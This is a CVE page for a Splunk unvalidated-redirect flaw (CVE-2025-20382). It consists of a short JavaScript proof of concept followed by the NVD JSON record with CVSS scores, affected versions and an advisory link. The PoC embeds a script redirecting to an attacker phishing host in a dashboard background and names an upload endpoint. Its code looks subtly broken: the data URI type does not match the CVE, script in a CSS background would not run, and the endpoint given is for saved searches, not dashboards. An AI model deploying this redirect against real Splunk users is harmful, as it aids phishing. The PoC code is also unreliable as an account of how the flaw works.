CVE-2025-20382

// CVE-2025-20382 PoC - Splunk Unvalidated Redirect via data:image/png;base64 // This PoC demonstrates how an attacker can bypass Splunk's external URL warning // Step 1: Create a malicious data URI with embedded redirect const maliciousDataUri = 'data:text/html;base64,' + btoa(` <html> <body> <script> // Redirect to attacker-controlled site window.location.href = 'https://attacker.example.com/phishing'; </script> </body> </html> `); // Step 2: Construct the dashboard XML with malicious background const dashboardXml = ` <dashboard> <label>Malicious Dashboard</label> <row> <panel> <html> <div style="background-image: url('${maliciousDataUri}')"> <h1>Click here for more info</h1> </div> </html> </panel> </row> </dashboard> `; // Step 3: Upload the malicious dashboard via Splunk API // POST to /servicesNS/nobody/search/saved/searches const splunkApiUrl = 'https://target-splunk.com:8089/servicesNS/{user}/{app}/saved/searches'; // Note: Attacker must have low-privilege Splunk account // Target user must interact (click) to trigger redirect

{"cve": {"id": "CVE-2025-20382", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:50.380", "lastModified": "2025-12-05T18:33:45.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.10, 10.0.2503.8, and 9.3.2411.120, a low-privileged user that does not hold the \"admin\" or \"power\" Splunk roles could create a views dashboard with a custom background using the `data:image/png;base64` protocol that could potentially lead to an unvalidated redirect. This behavior circumvents the Splunk external URL warning mechanism by using a specially crafted URL, allowing for a redirection to an external malicious site. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The authenticated user should not be able to exploit the vulnerability at will."}, {"lang": "es", "value": "En las versiones de Splunk Enterprise anteriores a 10.0.2, 9.4.6, 9.3.8 y 9.2.10, y en las versiones de Splunk Cloud Platform anteriores a 10.1.2507.10, 10.0.2503.8 y 9.3.2411.120, un usuario con privilegios bajos que no posee los roles de Splunk 'admin' o 'power' podría crear un panel de vistas con un fondo personalizado utilizando el protocolo 'data:image/png;base64' que podría conducir potencialmente a una redirección no validada. Este comportamiento elude el mecanismo de advertencia de URL externa de Splunk mediante el uso de una URL especialmente diseñada, permitiendo una redirección a un sitio malicioso externo. La vulnerabilidad requiere que el atacante realice phishing a la víctima engañándolos para que inicien una solicitud dentro de su navegador. El usuario autenticado no debería poder explotar la vulnerabilidad a voluntad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.2", "matchCriteriaId": "4413D4BE-F225-4C28-B401-EB46D8F34160"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2411", "versionEndExcluding": "9.3.2411.120", "matchCriteriaId": "B6CA3000-9C26-45B9-A2A2-C22F3F4246BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.2503", "versionEndExcluding": "10.0.2503.8", "matchCriteriaId": "D269788F-7244-4307-B551-C1B943EF2BB9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.2507", "versionEndExcluding": "10.1.2507.10", "matchCriteriaId": "B4124F3F-581D-429F-AB92-4C7515AA16A5"}]}]}], "references": [{"url": "https://advisory.splunk.com/advisories/SVD-2025-1201", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}